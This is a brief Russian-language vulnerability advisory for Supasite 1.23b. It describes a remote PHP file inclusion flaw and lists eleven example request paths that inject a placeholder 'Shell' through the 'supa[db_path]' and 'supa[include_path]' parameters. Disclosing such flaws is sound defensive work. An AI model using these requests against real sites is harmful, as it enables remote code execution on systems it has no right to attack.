Программа: Supasite 1.23b
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «supa[db_path]» множественными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
[Path]/supasite/common_functions.php?supa[db_path]=Shell
[Path]/supasite/admin_auth_cookies.php?supa[db_path]=Shell
[Path]/supasite/admin_mods.php?supa[db_path]=Shell
[Path]/supasite/admin_news.php?supa[db_path]=Shell
[Path]/supasite/admin_settings.php?supa[include_path]=Shell
[Path]/supasite/admin_topics.php?supa[db_path]=Shell
[Path]/supasite/admin_users.php?supa[db_path]=Shell
[Path]/supasite/admin_utilities.php?supa[db_path]=Shell
[Path]/supasite/backend_site.php?supa[include_path]=Shell
[Path]/supasite/site_comment.php?supa[db_path]=Shell
[Path]/supasite/site_news.php?supa[db_path]=Shell
